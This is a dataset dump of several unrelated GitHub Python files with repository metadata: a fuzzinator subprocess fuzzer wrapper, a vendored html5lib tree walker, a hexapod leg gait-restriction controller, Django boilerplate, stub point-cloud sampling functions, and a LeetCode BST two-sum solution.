blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
70b4ecc28943ca349c7ef7077d2dc62e6d3ba2c1 | c1646925d393914477aa22e279d20ab8103a5e9f | /fuzzinator/fuzzer/subprocess_runner.py | 8191d1f4b4284dec8ec3e020b49aa25180a40327 | [
"BSD-3-Clause"
] | permissive | harmmachine/fuzzinator | 574d0a6d424a2beb6a305ecb5b8621d4b7a22a2b | 6d0eea40457b93b0fef295e1e14524ad68ee748f | refs/heads/master | 2021-06-08T21:10:51.248453 | 2016-11-14T10:29:22 | 2016-11-14T10:29:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,221 | py | # Copyright (c) 2016 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import json
import shutil
import subprocess
import os
class SubprocessRunner(object):
    """
    Wrapper around a fuzzer that is available as an executable and can generate
    its test cases as file(s) in a directory. First, the external executable is
    invoked as a subprocess, and once it has finished, the contents of the
    generated files are returned one by one.

    **Mandatory parameters of the fuzzer:**

    - ``command``: string to pass to the child shell as a command to run (all
      occurrences of ``{uid}`` in the string are replaced by an identifier
      unique to this fuzz job).
    - ``outdir``: path to the directory containing the files generated by the
      external fuzzer (all occurrences of ``{uid}`` in the path are replaced
      by the same identifier as described at the ``command`` parameter).

    **Optional parameters of the fuzzer:**

    - ``cwd``: if not ``None``, change working directory before the command
      invocation.
    - ``env``: if not ``None``, a dictionary of variable names-values to
      update the environment with.

    **Example configuration snippet:**

    .. code-block:: ini

        [sut.foo]
        # see fuzzinator.call.*

        [fuzz.foo-with-bar]
        sut=sut.foo
        fuzzer=fuzzinator.fuzzer.SubprocessRunner
        batch=50

        [fuzz.foo-with-bar.fuzzer.init]
        outdir=${fuzzinator:work_dir}/bar/{uid}
        command=barfuzzer -n ${fuzz.foo-with-bar:batch} -o ${outdir}
    """

    def __init__(self, outdir, command, cwd=None, env=None, **kwargs):
        """
        :param outdir: directory the external fuzzer writes test cases into;
            ``{uid}`` placeholders are substituted.
        :param command: shell command line to run; ``{uid}`` placeholders are
            substituted.
        :param cwd: working directory for the command (defaults to the
            current working directory).
        :param env: JSON-encoded dict of extra environment variables, merged
            on top of the current environment.
        """
        # uid is used to make sure we create a unique directory for the
        # generated test cases, even if several jobs run the same fuzzer.
        self.uid = '{pid}-{id}'.format(pid=os.getpid(), id=id(self))
        self.outdir = outdir.format(uid=self.uid)
        self.command = command
        self.cwd = cwd or os.getcwd()
        self.env = dict(os.environ, **json.loads(env)) if env else None
        self.tests = []

    def __enter__(self):
        """Run the external fuzzer to completion and collect the paths of
        the test cases it generated."""
        os.makedirs(self.outdir, exist_ok=True)
        # subprocess.DEVNULL replaces the manually opened os.devnull handle
        # of the original implementation (same effect, idiomatic Python 3).
        with subprocess.Popen(self.command.format(uid=self.uid),
                              cwd=self.cwd,
                              env=self.env,
                              shell=True,
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL) as proc:
            proc.wait()
        self.tests = [os.path.join(self.outdir, test) for test in os.listdir(self.outdir)]
        return self

    def __exit__(self, *exc):
        """Remove the directory of generated test cases."""
        shutil.rmtree(self.outdir, ignore_errors=True)
        return None

    # Although kwargs is not used here, the 'index' argument will be passed
    # anyhow and it has to be accepted.
    def __call__(self, **kwargs):
        """Return the raw content of the next generated test case, or
        ``None`` once all of them have been consumed."""
        if not self.tests:
            return None
        test = self.tests.pop()
        with open(test, 'rb') as f:
            return f.read()
| [
"reni@inf.u-szeged.hu"
] | reni@inf.u-szeged.hu |
e1ff943f227873288abcaa9d018334cfc0af1406 | a2211f0ef8297a77200a0b2eec8ba3476989b7e6 | /itcast/06_Django/day01_Django入门/demo03_Module.py | e363d13f3109bb7c2ac9c46470415e9f547d03a0 | [] | no_license | qq1197977022/learnPython | f720ecffd2a70044f1644f3527f4c29692eb2233 | ba294b8fa930f784304771be451d7b5981b794f3 | refs/heads/master | 2020-03-25T09:23:12.407510 | 2018-09-16T00:41:56 | 2018-09-16T00:42:00 | 143,663,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | # 图书表结构
# 表名: Book
# 图书名: name
# 图书发布日期: date
# 英雄表结构
# 表名: Hero
# 英雄姓名: name
# 英雄性别: gender
# 英雄简介: introduce
# 所属图书: book
# E-R模型
# E:
# 1.图书
# 2.英雄
# R n:1 ~ 多对一
# Models映射关系
# 1.类对象: 表
# 2.类对象数据属性: 表字段
# 1.因此仅CURD类对象数据属性时才需要migrate, CURD方法无需migrate ~ 不对应数据库数据
# 2.id字段会默认自动添加
# 3.实例对象: 数据记录
#
| [
"1197977022@qq.com"
] | 1197977022@qq.com |
00e5ac08fe0d6db9b3ad6031826c2e0b81bcce83 | 4d05be863b63a56a90b4c46b15069827b33ecaae | /django/venv/Lib/site-packages/pip/_vendor/html5lib/treewalkers/_base.py | 1b1b58b4d9126ec55aa0147c945fac92d6ec1b01 | [] | no_license | leeo1116/PyCharm | e532fa9754056019508cc454214ee1a8ad9b26a9 | b6942c05c27556e5fe47879e8b823845c84c5430 | refs/heads/master | 2022-11-06T00:43:14.882453 | 2017-07-13T04:50:00 | 2017-07-13T04:50:00 | 36,851,636 | 0 | 1 | null | 2022-10-20T10:44:39 | 2015-06-04T06:09:09 | Python | UTF-8 | Python | false | false | 7,062 | py | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type, string_types
__all__ = ["DOCUMENT", "DOCTYPE", "TEXT", "ELEMENT", "COMMENT", "ENTITY", "UNKNOWN",
"TreeWalker", "NonRecursiveTreeWalker"]
from xml.dom import Node
DOCUMENT = Node.DOCUMENT_NODE
DOCTYPE = Node.DOCUMENT_TYPE_NODE
TEXT = Node.TEXT_NODE
ELEMENT = Node.ELEMENT_NODE
COMMENT = Node.COMMENT_NODE
ENTITY = Node.ENTITY_NODE
UNKNOWN = "<#UNKNOWN#>"
from ..constants import voidElements, spaceCharacters
spaceCharacters = "".join(spaceCharacters)
def to_text(s, blank_if_none=True):
    """Coerce *s* to text, mapping ``None`` to ``""`` (or passing ``None``
    through unchanged when *blank_if_none* is false)."""
    if s is None:
        return "" if blank_if_none else None
    if isinstance(s, text_type):
        return s
    return text_type(s)
def is_text_or_none(string):
    """Return True when *string* is either ``None`` or a text instance."""
    return isinstance(string, string_types) or string is None
class TreeWalker(object):
    """Base class for tree walkers: builds serializer token dicts.

    NOTE(review): throughout this vendored copy the token payload key is
    "simba_data" where upstream html5lib uses "data" -- apparently a global
    find/replace artifact; consumers in this tree rely on the same key, so
    it is kept as-is.
    """
    def __init__(self, tree):
        # tree: the document tree this walker iterates over
        self.tree = tree
    def __iter__(self):
        # Subclasses must yield token dicts for the whole tree.
        raise NotImplementedError
    def error(self, msg):
        """Build a SerializeError token carrying *msg*."""
        return {"type": "SerializeError", "simba_data": msg}
    def emptyTag(self, namespace, name, attrs, hasChildren=False):
        """Generator yielding an EmptyTag token, plus an error token when a
        void element unexpectedly has children."""
        assert namespace is None or isinstance(namespace, string_types), type(namespace)
        assert isinstance(name, string_types), type(name)
        assert all((namespace is None or isinstance(namespace, string_types)) and
                   isinstance(name, string_types) and
                   isinstance(value, string_types)
                   for (namespace, name), value in attrs.items())
        yield {"type": "EmptyTag", "name": to_text(name, False),
               "namespace": to_text(namespace),
               "simba_data": attrs}
        if hasChildren:
            yield self.error("Void element has children")
    def startTag(self, namespace, name, attrs):
        """Build a StartTag token; attribute keys and values are coerced to
        text via to_text()."""
        assert namespace is None or isinstance(namespace, string_types), type(namespace)
        assert isinstance(name, string_types), type(name)
        assert all((namespace is None or isinstance(namespace, string_types)) and
                   isinstance(name, string_types) and
                   isinstance(value, string_types)
                   for (namespace, name), value in attrs.items())
        return {"type": "StartTag",
                "name": text_type(name),
                "namespace": to_text(namespace),
                "simba_data": dict(((to_text(namespace, False), to_text(name)),
                                    to_text(value, False))
                                   for (namespace, name), value in attrs.items())}
    def endTag(self, namespace, name):
        """Build an EndTag token."""
        # NOTE(review): the second assertion reports type(namespace) even
        # though the check is on name -- same as upstream html5lib.
        assert namespace is None or isinstance(namespace, string_types), type(namespace)
        assert isinstance(name, string_types), type(namespace)
        return {"type": "EndTag",
                "name": to_text(name, False),
                "namespace": to_text(namespace),
                "simba_data": {}}
    def text(self, data):
        """Generator splitting *data* into up to three tokens: leading
        SpaceCharacters, Characters body, trailing SpaceCharacters."""
        assert isinstance(data, string_types), type(data)
        data = to_text(data)
        # split off leading whitespace
        middle = data.lstrip(spaceCharacters)
        left = data[:len(data) - len(middle)]
        if left:
            yield {"type": "SpaceCharacters", "simba_data": left}
        # split off trailing whitespace
        data = middle
        middle = data.rstrip(spaceCharacters)
        right = data[len(middle):]
        if middle:
            yield {"type": "Characters", "simba_data": middle}
        if right:
            yield {"type": "SpaceCharacters", "simba_data": right}
    def comment(self, data):
        """Build a Comment token."""
        assert isinstance(data, string_types), type(data)
        return {"type": "Comment", "simba_data": text_type(data)}
    def doctype(self, name, publicId=None, systemId=None, correct=True):
        """Build a Doctype token; all fields are coerced to text."""
        assert is_text_or_none(name), type(name)
        assert is_text_or_none(publicId), type(publicId)
        assert is_text_or_none(systemId), type(systemId)
        return {"type": "Doctype",
                "name": to_text(name),
                "publicId": to_text(publicId),
                "systemId": to_text(systemId),
                "correct": to_text(correct)}
    def entity(self, name):
        """Build an Entity token."""
        assert isinstance(name, string_types), type(name)
        return {"type": "Entity", "name": text_type(name)}
    def unknown(self, nodeType):
        """Build an error token for an unrecognised node type."""
        return self.error("Unknown node type: " + nodeType)
class NonRecursiveTreeWalker(TreeWalker):
    """TreeWalker that iterates a tree without recursion.

    Subclasses provide the four node-navigation primitives below; __iter__
    then performs an explicit depth-first traversal, emitting tokens via
    the builder methods inherited from TreeWalker.
    """
    def getNodeDetails(self, node):
        # Must return a tuple whose first item is a node-type constant
        # (DOCUMENT, DOCTYPE, TEXT, ELEMENT, COMMENT, ENTITY, ...) followed
        # by type-specific details.
        raise NotImplementedError
    def getFirstChild(self, node):
        raise NotImplementedError
    def getNextSibling(self, node):
        raise NotImplementedError
    def getParentNode(self, node):
        raise NotImplementedError
    def __iter__(self):
        """Depth-first traversal of self.tree yielding serializer tokens."""
        currentNode = self.tree
        while currentNode is not None:
            details = self.getNodeDetails(currentNode)
            type, details = details[0], details[1:]
            hasChildren = False
            # emit the token(s) for the current node
            if type == DOCTYPE:
                yield self.doctype(*details)
            elif type == TEXT:
                for token in self.text(*details):
                    yield token
            elif type == ELEMENT:
                namespace, name, attributes, hasChildren = details
                if name in voidElements:
                    # void elements are never descended into; emptyTag also
                    # yields an error token when children are present
                    for token in self.emptyTag(namespace, name, attributes,
                                               hasChildren):
                        yield token
                    hasChildren = False
                else:
                    yield self.startTag(namespace, name, attributes)
            elif type == COMMENT:
                yield self.comment(details[0])
            elif type == ENTITY:
                yield self.entity(details[0])
            elif type == DOCUMENT:
                hasChildren = True
            else:
                yield self.unknown(details[0])
            # descend into the first child when there is one
            if hasChildren:
                firstChild = self.getFirstChild(currentNode)
            else:
                firstChild = None
            if firstChild is not None:
                currentNode = firstChild
            else:
                # otherwise walk back up, emitting EndTag tokens, until a
                # next sibling is found or the traversal root is reached
                while currentNode is not None:
                    details = self.getNodeDetails(currentNode)
                    type, details = details[0], details[1:]
                    if type == ELEMENT:
                        namespace, name, attributes, hasChildren = details
                        if name not in voidElements:
                            yield self.endTag(namespace, name)
                    if self.tree is currentNode:
                        currentNode = None
                        break
                    nextSibling = self.getNextSibling(currentNode)
                    if nextSibling is not None:
                        currentNode = nextSibling
                        break
                    else:
                        currentNode = self.getParentNode(currentNode)
| [
"leeo1116@gmail.com"
] | leeo1116@gmail.com |
b1a1dfdb2ba394b8989fec6894adf5c9aa4ab69b | b7e14f2c87407abc986ab4c5002c8add9f023631 | /stompy/restriction/leg.py | b7e61af7ea5314d0009197daaec9e82aae16bc30 | [] | no_license | joelgreenwood/stompy | cc220f78f3c9ad7f4714cdae50f972a8d2dad60c | 395eafd8e350f099e5b14e8c5b013d9e122a4d47 | refs/heads/master | 2020-04-24T20:30:27.263064 | 2019-02-23T18:15:58 | 2019-02-23T18:15:58 | 172,246,468 | 0 | 0 | null | 2019-02-23T18:04:13 | 2019-02-23T18:04:12 | null | UTF-8 | Python | false | false | 12,914 | py | #!/usr/bin/env python
"""
Supply this a stance plan in body coordinates
it will produce plans in body coordinates
restriction will be updated with foot coordinates
it will produce 'requests' for plans that will be 'accepted'
"""
import time
import numpy
from .. import consts
from .. import geometry
from .. import kinematics
from .. import log
from .. import signaler
from .. import transforms
def swing_position_from_intersections(tc, rspeed, c0, ipts, step_ratio):
    """Pick the foot's swing target along its step circle.

    From the intersection points *ipts*, keep only those lying in the
    direction of rotation *rspeed* (judged by the sign of the 2D cross
    product of unit vectors from the turn center *tc*), take the angularly
    closest one to the current position *c0*, and return *c0* rotated about
    *tc* by *step_ratio* of that angle.  Falls back to *c0* when there is
    no usable intersection.
    """
    if len(ipts) == 0:
        return c0
    center = numpy.array(tc)
    cur_vec = numpy.array(c0) - center
    cur_dir = cur_vec / numpy.linalg.norm(cur_vec)
    best_angle = None
    best_sign = None
    for pt in ipts:
        vec = numpy.array(pt) - center
        direction = vec / numpy.linalg.norm(vec)
        # cross-product sign tells on which side of cur_dir this point lies
        angle_sign = numpy.sign(numpy.cross(direction, cur_dir))
        if numpy.sign(rspeed) != angle_sign:
            continue
        angle = numpy.arccos(numpy.clip(numpy.dot(direction, cur_dir), -1.0, 1.0))
        if best_angle is None or angle < best_angle:
            best_angle = angle
            best_sign = angle_sign
    if best_angle is None:
        return c0
    # rotate the vector from center to c0 by a fraction of the found angle
    rot = -best_sign * best_angle * step_ratio
    cos_r = numpy.cos(rot)
    sin_r = numpy.sin(rot)
    x, y = cur_vec
    return (
        x * cos_r - y * sin_r + center[0],
        x * sin_r + y * cos_r + center[1])
def calculate_swing_target(
        tx, ty, z, leg_number, rspeed, step_ratio,
        min_hip_distance=None, target_calf_angle=0):
    """Compute the 2D swing target (leg frame) for a rotating gait.

    The rest position is the x at which the calf sits at
    *target_calf_angle* for foot height *z*; a vertical calf is only
    reachable for roughly -75 < z < -19, so when that x falls outside the
    2D reachability limits the leg-plane center is used instead.  The
    target movement circle around (tx, ty) through the rest position is
    intersected with the leg limits and the swing position is picked from
    those intersections.
    """
    low, high = kinematics.leg.limits_at_z_2d(z)
    rest_x = kinematics.leg.x_with_calf_angle(z, target_calf_angle)
    if not (low < rest_x < high):
        rest_x, _ = kinematics.leg.xy_center_at_z(z)
    # circle around the rotation center passing through the rest position
    circle = {
        'center': (tx, ty),
        'radius': numpy.sqrt((tx - rest_x) ** 2. + (ty - 0.) ** 2.),
    }
    intersections = kinematics.leg.limit_intersections(
        circle, z, leg_number, min_hip_distance=min_hip_distance)
    return swing_position_from_intersections(
        [tx, ty], rspeed, [rest_x, 0], intersections, step_ratio)
def calculate_translation_swing_target(
        dx, dy, z, leg_number, rspeed, step_ratio,
        min_hip_distance=None, target_calf_angle=0):
    """Compute the 2D swing target (leg frame) for a translating gait.

    The foot is aimed *step_ratio* of a fixed stride (the 12 multiplier;
    presumably the full step length in leg-frame units -- TODO confirm)
    along the translation direction (dx, dy) from the leg's rest position
    at foot height *z*.

    rspeed, leg_number and min_hip_distance are accepted only for signature
    parity with calculate_swing_target; they are currently unused.
    """
    l, r = kinematics.leg.limits_at_z_2d(z)
    c0x = kinematics.leg.x_with_calf_angle(z, target_calf_angle)
    if c0x <= l or c0x >= r:
        c0x, _ = kinematics.leg.xy_center_at_z(z)
    # TODO calculate optimal step
    # NOTE: the original code also computed a normalized direction
    # (dx, dy) / max(|dx|, |dy|) here but never used it; that dead code
    # has been removed.
    return c0x + dx * step_ratio * 12., 0 + dy * step_ratio * 12.
def calculate_restriction(
        xyz, angles, limits, limit_eps, calf_eps, max_calf_angle):
    """Return a restriction score (capped at 1.0) for a leg pose.

    For each joint, an exponential of the signed distance past the nearer
    angle limit (normalized by the joint's half-range and scaled by
    *limit_eps*) is computed; the worst joint sets the score.  When
    *calf_eps* is non-negligible, an analogous term for the calf angle is
    folded in as well.  *xyz* is accepted for interface parity but unused.
    """
    restriction = 0
    for joint in ('hip', 'thigh', 'knee'):
        lo, hi = limits[joint]
        mid = (hi + lo) / 2.
        half_range = float(max(abs(mid - hi), abs(lo - mid)))
        angle = angles[joint]
        # signed distance past the nearer limit (negative while inside)
        overshoot = (angle - hi) if angle > mid else (lo - angle)
        # only the worst joint determines the restriction
        joint_r = min(1.0, numpy.exp(limit_eps * (overshoot / half_range)))
        restriction = max(joint_r, restriction)
    # calf angle term; skipped when calf_eps is effectively zero
    if calf_eps > 0.001:
        calf = abs(kinematics.leg.angles_to_calf_angle(
            angles['hip'], angles['thigh'], angles['knee']))
        calf_r = min(1.0, numpy.exp(
            calf_eps * ((calf - max_calf_angle) / max_calf_angle)))
        restriction = max(calf_r, restriction)
    return restriction
class Foot(signaler.Signaler):
    """Per-leg restriction/gait state machine.

    Listens to its Leg for 'xyz' and 'angles' events, computes a
    restriction score for the current pose, and steps the foot through the
    gait states stance -> lift -> swing -> lower -> wait, sending the
    matching motion plan to the leg on every state change.
    """
    def __init__(
            self, leg, cfg):
        super(Foot, self).__init__()
        self.leg = leg
        self.cfg = cfg
        # joint angle limits specific to this leg
        self.limits = geometry.get_limits(self.leg.leg_number)
        self.logger = log.make_logger(
            'Res-%s' %
            consts.LEG_NAME_BY_NUMBER[self.leg.leg_number])
        # update() runs once both an xyz and an angles event have arrived
        self.leg.on('xyz', self.on_xyz)
        self.leg.on('angles', self.on_angles)
        self.last_lift_time = time.time()
        self.leg_target = None
        self.body_target = None
        self.swing_target = None
        self.swing_info = None
        # z at which the leg was last observed unloaded (set during 'lift')
        self.unloaded_height = None
        # stance -> lift -> swing -> lower -> wait
        self.state = None
        self.restriction = None
        # caches of the latest leg events; cleared after every update()
        self.xyz = None
        self.angles = None
        # extra restriction added externally (e.g. from the ui/controller)
        self.restriction_modifier = 0.
    def send_plan(self):
        """Send the motion plan matching the current gait state to the leg."""
        #print("res.send_plan: [%s]%s" % (self.leg.leg_number, self.state))
        if self.state is None or self.leg_target is None:
            # TODO always stop on disable?
            self.leg.send_plan(mode=consts.PLAN_STOP_MODE)
        elif self.state in ('stance', 'wait'):
            # follow the body-motion matrix while on the ground
            self.leg.send_plan(
                mode=consts.PLAN_MATRIX_MODE,
                frame=consts.PLAN_LEG_FRAME,
                matrix=self.leg_target,
                speed=0)
        elif self.state == 'lift':
            # stance matrix plus an upward z translation per plan tick
            v = self.cfg.get_speed('lift')
            T = (
                self.leg_target *
                transforms.translation_3d(0, 0, v * consts.PLAN_TICK))
            #print(self.leg_target, T)
            self.leg.send_plan(
                mode=consts.PLAN_MATRIX_MODE,
                frame=consts.PLAN_LEG_FRAME,
                matrix=T,
                speed=0)
        elif self.state == 'swing':
            # move the raised foot toward the computed swing target
            z = self.unloaded_height + self.cfg.lift_height
            if self.swing_info is None: # assume target of 0, 0
                sp = calculate_translation_swing_target(
                    0, 0, self.cfg.lower_height,
                    self.leg.leg_number, None, 0.,
                    min_hip_distance=self.cfg.min_hip_distance,
                    target_calf_angle=self.cfg.target_calf_angle)
            elif len(self.swing_info) == 3: # rotation
                rx, ry, rspeed = self.swing_info
                sp = calculate_swing_target(
                    rx, ry, self.cfg.lower_height,
                    self.leg.leg_number, rspeed, self.cfg.step_ratio,
                    min_hip_distance=self.cfg.min_hip_distance,
                    target_calf_angle=self.cfg.target_calf_angle)
            else: # translation
                lx, ly = self.swing_info
                sp = calculate_translation_swing_target(
                    lx, ly, self.cfg.lower_height,
                    self.leg.leg_number, None, self.cfg.step_ratio,
                    min_hip_distance=self.cfg.min_hip_distance,
                    target_calf_angle=self.cfg.target_calf_angle)
            self.swing_target = sp[0], sp[1]
            # print(self.swing_target, z)
            # TODO check if point is valid
            # TODO error out on invalid
            self.leg.send_plan(
                mode=consts.PLAN_TARGET_MODE,
                frame=consts.PLAN_LEG_FRAME,
                linear=(
                    sp[0],
                    sp[1],
                    z),
                speed=self.cfg.get_speed('swing'))
        elif self.state == 'lower':
            # stance matrix plus a downward z translation per plan tick
            v = -self.cfg.get_speed('lower')
            T = (
                self.leg_target *
                transforms.translation_3d(0, 0, v * consts.PLAN_TICK))
            self.leg.send_plan(
                mode=consts.PLAN_MATRIX_MODE,
                frame=consts.PLAN_LEG_FRAME,
                matrix=T,
                speed=0)
    def set_target(self, target, update_swing=True):
        """Convert a body-frame stance target to a leg-frame plan matrix.

        When update_swing is true, also remember the rotation parameters so
        the next swing target is computed against this stance plan.
        """
        self.logger.debug({'set_target': (target, update_swing)})
        bx, by = target.rotation_center
        rx, ry, rz = kinematics.body.body_to_leg(
            self.leg.leg_number, bx, by, 0)
        lT = transforms.rotation_about_point_3d(
            rx, ry, rz, 0, 0, target.speed)
        # TODO add z change
        if update_swing:
            self.swing_info = (rx, ry, target.speed)
            self.swing_target = None
        self.leg_target = lT
        self.send_plan()
    def set_state(self, state):
        """Transition to *state*, re-send the plan and signal observers."""
        if state != self.state and self.restriction is not None:
            # reset restriction smoothing
            #print("resetting dr")
            self.restriction['dr'] = 0.
        self.state = state
        self.logger.debug({'state': state})
        if self.state == 'lift':
            # unloaded height is re-detected on every lift
            self.unloaded_height = None
            self.last_lift_time = time.time()
        elif self.state == 'swing':
            pass
        self.send_plan()
        self.trigger('state', state)
    def calculate_restriction(self, xyz, angles):
        """Calculate leg restriction
        Result is stored in self.restriction and signaled as 'restriction'
        Result contains:
        - time: time of xyz event
        - r: current calculated restriction
        - idr: slope of restriction change from last to new value
        - dr: smoothed idr
        """
        # calls the module-level calculate_restriction (the method name
        # shadows it only in attribute lookup, not in this scope)
        r = calculate_restriction(
            xyz, angles, self.limits, self.cfg.eps,
            self.cfg.calf_eps, self.cfg.max_calf_angle)
        # TODO use calf angle
        # add in the 'manual' restriction modifier (set from ui/controller)
        r += self.restriction_modifier
        if self.restriction is not None:
            pt = self.restriction['time']
            dt = (xyz['time'] - pt)
            idr = (r - self.restriction['r']) / dt
            # exponentially smoothed slope of the restriction
            dr = (
                self.restriction['dr'] * self.cfg.dr_smooth +
                idr * (1. - self.cfg.dr_smooth))
        else: # if no previous value, can't calculate dr
            idr = 0.
            dr = 0.
        self.restriction = {
            'time': xyz['time'], 'r': r, 'dr': dr, 'idr': idr}
        self.logger.debug({'restriction': self.restriction})
        self.trigger('restriction', self.restriction)
    def _is_swing_done(self, xyz):
        """True when the foot is within swing_slop of the swing target."""
        tx, ty = self.swing_target
        d = ((tx - xyz['x']) ** 2. + (ty - xyz['y']) ** 2.) ** 0.5
        # TODO also check for increase in distance
        return d < self.cfg.swing_slop
    def on_xyz(self, xyz):
        """Cache a leg xyz event; run update() once angles also arrived."""
        self.xyz = xyz
        if self.angles is not None:
            self.update()
    def on_angles(self, angles):
        """Cache a leg angles event; run update() once xyz also arrived."""
        self.angles = angles
        if self.xyz is not None:
            self.update()
    def update(self):
        """Evaluate restriction and state-transition conditions for the
        most recent xyz/angles pair, then clear the event caches."""
        # TODO if angles['valid'] is False?
        self.calculate_restriction(self.xyz, self.angles)
        new_state = None
        if self.state is None: # restriction control is disabled
            self.xyz = None
            self.angles = None
            return
        elif self.state == 'swing':
            if self._is_swing_done(self.xyz):
                new_state = 'lower'
        elif self.state == 'lower':
            # TODO check for loaded >L lbs
            #if self.xyz['z'] < self.lower_height:
            # foot is near lower height and the calf reports load
            if (
                    (
                        (self.xyz['z'] - self.cfg.lower_height) <
                        self.cfg.height_slop) and
                    self.angles['calf'] > self.cfg.loaded_weight):
                new_state = 'wait'
        elif self.state == 'wait':
            # restriction started increasing: rejoin the stance
            if self.restriction['dr'] > 0.:
                # print(
                #     "exiting wait[%s]: %s" %
                #     (self.leg.leg_number, self.restriction))
                new_state = 'stance'
        #elif self.state == 'stance'
        elif self.state == 'lift':
            # check for unloaded and >Z inches off ground
            if (
                    self.unloaded_height is None and
                    self.angles['calf'] < self.cfg.unloaded_weight):
                self.unloaded_height = self.xyz['z']
            if (
                    self.unloaded_height is not None and
                    self.xyz['z'] > (
                        self.unloaded_height + self.cfg.lift_height)):
                new_state = 'swing'
            #if self.xyz['z'] > self.lift_height:
            #    new_state = 'swing'
        # clear xyz and angles cache
        self.xyz = None
        self.angles = None
        if new_state is not None:
            #print(
            #    "setting new state[%s]: %s, %s" % (
            #        self.leg.leg_number, new_state, self.restriction))
            self.set_state(new_state)
| [
"brettgraham@gmail.com"
] | brettgraham@gmail.com |
f31f84c2ec744d3c6647888392a55969ccdec528 | 891f2da7934e4751e165c9537cf993730f04c19b | /manage.py | eb9f68f4821c35e7d9c0ac1226e721d2f64ae162 | [] | no_license | Aryan0807/alumni_portal | e75d1d8005252b240bd5e286371927be02e84a72 | 0a73d5faab4bd77fbebc0588e3fb89978d780a61 | refs/heads/master | 2023-06-22T13:15:38.357455 | 2021-07-20T05:17:39 | 2021-07-20T05:17:39 | 386,740,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django administrative tasks for the ``alumniportal`` project."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'alumniportal.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as err:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from err
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"you@example.com"
] | you@example.com |
47736549784a127f5f6fbf30a3c83f167d46bee4 | 462670fdda0c89ab500a131abd84628ce7281847 | /utils_xyz/sample_group_blockid.py | f46c8876c35b1fadc790972f110753c039c2101a | [
"MIT"
] | permissive | xuyongzhi/dynamic_pointnet | 528d7cc7384c096a6e81ab41c7291e6897e4cfdb | f4a5a6203840babd40783716b127219e4655cbaf | refs/heads/master | 2021-03-27T20:38:54.622833 | 2018-03-26T06:07:27 | 2018-03-26T06:07:27 | 111,261,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | # xyz Decc 2017
# Do 3d point cloud sample and group by block index
def get_sample_group_idxs(npoint, block_step, nsample):
    """Return (sample_idxs, group_idxs) for block-indexed sampling.

    Unimplemented stub: the original body returned the undefined names
    ``sample_idxs`` and ``group_idxs`` and could only ever raise a
    ``NameError``; raising ``NotImplementedError`` makes the missing
    implementation explicit.
    """
    raise NotImplementedError(
        'get_sample_group_idxs is an unimplemented stub')
def sample_and_group(npoint, block_step, nsample):
    '''
    Get npoint sub-blocks with equal stride and <block_step> step. The center of each sub-block is npoint down-sampled points.
    In each sub-block, nsample points are extracted.
    '''
    # Unimplemented stub: the original body returned the undefined names
    # (new_xyz, sub_block_idxs, group_idxs, grouped_xyz) and would always
    # raise NameError; raise NotImplementedError to make that explicit.
    raise NotImplementedError('sample_and_group is an unimplemented stub')
| [
"buaaxyz@yeah.net"
] | buaaxyz@yeah.net |
02f1709794680778775a1bff3b92d7b941023984 | 762cbba14c80f4dd09fa6e5915e094825eef1cae | /653. Two Sum IV - Input is a BST.py | db1433542d4832888a00278cd4eb95174686af67 | [] | no_license | arnabs542/Leetcode-18 | 1faff2564b4a5bb970308187a0b71553fd85a250 | 02d31ab3363c92e8fdde15100bf4a3cbcd43ecd0 | refs/heads/master | 2022-07-26T12:18:38.834287 | 2020-05-19T05:40:48 | 2020-05-19T05:40:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def findTarget(self, root, k):
        """Return True if two distinct BST nodes sum to the target k.

        An iterative in-order traversal collects the values in sorted
        order; two converging pointers then search for a pair summing
        to k.

        :type root: TreeNode
        :type k: int
        :rtype: bool
        """
        values = []
        stack = []
        node = root
        # iterative in-order traversal (left, node, right)
        while stack or node is not None:
            while node is not None:
                stack.append(node)
                node = node.left
            node = stack.pop()
            values.append(node.val)
            node = node.right
        # two-pointer scan over the sorted values
        lo, hi = 0, len(values) - 1
        while lo < hi:
            total = values[lo] + values[hi]
            if total < k:
                lo += 1
            elif total > k:
                hi -= 1
            else:
                return True
        return False
# Given a Binary Search Tree and a target number, return true if there exist two elements in the BST such that their sum is equal to the given target.
| [
"noreply@github.com"
] | arnabs542.noreply@github.com |
